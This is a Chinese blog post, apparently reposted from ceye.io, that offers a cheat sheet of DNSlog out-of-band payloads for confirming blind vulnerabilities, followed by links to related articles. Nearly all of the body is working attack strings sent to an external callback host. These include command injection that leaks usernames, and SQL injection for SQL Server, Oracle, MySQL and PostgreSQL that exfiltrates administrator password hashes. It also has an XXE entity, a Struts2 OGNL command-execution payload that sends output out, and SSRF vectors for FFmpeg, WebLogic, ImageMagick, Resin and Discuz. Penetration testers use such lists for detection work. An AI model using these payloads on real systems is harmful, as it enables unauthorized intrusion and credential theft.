利用DNSlog技术间接判断漏洞是否存在的常用payload

最新推荐文章于 2024-06-28 11:53:51 发布
最新推荐文章于 2024-06-28 11:53:51 发布
阅读量4.7k 收藏 2
点赞数
分类专栏: 安全
0x00 Command Execution
i. *nix: 

curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows 

ping %USERNAME%.b182oj.ceye.io
0x01 SQL Injection
From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.

i. SQL Server 

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
 EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

ii. Oracle 

SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

iii. MySQL 

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

iv. PostgreSQL 

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

0x02 XML Entity Injection 


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

0x03 Others
i. Struts2 

xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}


xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

ii. FFMpeg 
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST



iii. Weblogic 

xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search



iv. ImageMagick

push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context


v. Resin 


xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf


vi. Discuz 


http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

转载:http://ceye.io/payloads


nextdoor6
关注
专栏目录
Web安全漏洞——SSTI模版注入(初级)
m0_61506558的博客
11-12 1440
(这里特指用于Web开发的模版引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模版引擎来生成前端的html代码,模版引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模版+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前(如图一)。模版引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。(一)简介用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
代码讲故事
02-04 484
靶机实战bwapp亲测xxe漏洞攻击及自动化XXE注射工具分析利用
如何使用DNSStager在DNS中隐藏Payload
MSB_WLAQ的博客
09-29 363
关于DNSStager DNSStager是一个基于Python开发的开源项目,可以帮助广大研究人员使用DNS来隐藏和传输PayloadDNSStager可以创建一个恶意DNS服务器,并负责处理我们域名相关的DNS请求,然后将Payload隐藏在响应中的指定记录请求中,比如说“AAAA”记录或“TXT”记录,而且DNSStager还会使用各种不同的算法来对Payload进行编码。 DNSStager能够生成基于C或Golang的自定义代理,主要负责解析一系列域名、获取Payload...
DNSLog使用方法
热门推荐
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
【安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-28 3385
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
dnslog使用方法
qq_36232967的博客
06-20 1656
在实际使用中,DNSLog 可以用于获取恶意软件的 C&C 服务器、验证域名接入情况、检测恶意软件的行为等。请注意,使用 DNSLog 应该遵循合法和道德的原则,确保仅在合法且授权的环境中使用。此外,具体的 DNSLog 使用方法可能会根据所选择的平台而有所不同,你应该参考平台提供的文档和指南以获得更详细的操作说明。设置 DNS 配置:将你要测试的系统或应用程序的 DNS 配置中的某个域名或主机名设置为你创建的域名,例如将。创建域名:在注册的平台上,你可以创建一个自定义的域名,例如。
DNSlog使用
shangMD01的博客
12-04 928
打开dnslog平台: 点击Get SunDomain获取域名并复制: 复制完打开新网页并粘贴在url上访问,在DNSlog网页内刷新,就会出现一条DNS记录:
java安全(四) JNDI
weixin_45694388的博客
03-25 8983
JNDI JNDI(Java Naming and Directory Interface)是Java提供的Java 命名和目录接口。通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDI是Java EE的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源),JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA 通俗理解,使用jndi作为数据源而不是直接去连接数据库,将数据库交给jndi去配置管理,jndi通过数据源名称去应用数据
自动化数据分析下的威胁发现
Tencent_SRC的博客
08-16 411
文|宙斯盾流量安全分析团队彦修不记得多早之前,大概是2020年9月3号15点37分25秒181毫秒写过一篇信息搜集过程中有关数据分析的文章(原文链接),或许有读者会问,这么精确的时间我为什...
DNSLog使用
weixin_51151193的博客
12-29 1213
DNSLog基本使用
dnslog.cn的使用
weixin_43622525的博客
12-04 9031
网站首页 1点击 Get SubDomain 2复制1x7ojc.dnslog.cn 3打开cmd命令行 4输入nslookup1x7ojc.dnslog.cn 5回到dnslog.cn点击Refresh Record 总结: 用来判断是否可以连接外网
DNSLOGPayload
weixin_30735745的博客
06-07 399
命令执行处 linux curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io windows ping %USERNAME%.b182oj.ceye.io 1.//变量 类型 描述 2.//%ALLUS...
DNSlog漏洞探测
2301_80661529的博客
03-16 1948
DNSlog 是一种 DNS 隧道技术,用于数据泄露或命令和控制(C2)通信。它利用 DNS 协议的特性,将数据编码为 DNS 查询或响应,从而实现数据通信。DNSlog 可用于检测子域取代、未授权区域传输和其他 DNS 相关漏洞。攻击者:攻击者将数据编码为 DNS 查询或响应,然后将其发送到 DNS 服务器。DNS 服务器:DNS 服务器会解析查询,并将响应发送回攻击者。攻击者:攻击者可以从 DNS 响应中提取数据,从而实现数据泄露或 C2 通信。
DNSLog漏洞探测(一)之DNSLog介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 6081
DNSLog是一种基于DNS协议的信息收集技术,它可以用于网络安全领域的渗透测试、漏洞挖掘等方面。DNSLog的原理是利用DNS协议的特性,将需要收集的信息编码成DNS查询请求,然后将请求发送到DNS服务器,最后通过DNS服务器的响应来获取信息。DNSLog的实现方式有很多种,其中最常见的是使用第三方DNS服务。DNSLog的优点是隐蔽性高,缺点是响应时间较慢和存在一定的误报率。
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 960
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
DNSLog注入
errorr0
06-27 1157
DNSLog注入漏洞
mysql dnslog_DNSLOG用法
weixin_33018713的博客
01-27 261
0x00 Command Executioni. *nix:curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj.ceye.ioii. windowsping %USERNAME%.b182oj.ceye.io0x01 SQL Injectioni. SQL ServerDECLARE @host varch...
dnslog检测远程依赖
azraelxuemo的博客
01-03 534
有时候我们发现远程有一个反序列化的漏洞,但是我们不知道有什么依赖,如果单纯的盲打反序列化链就要一个个试,如果知道依赖了以后我们也方便本地构造payload
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值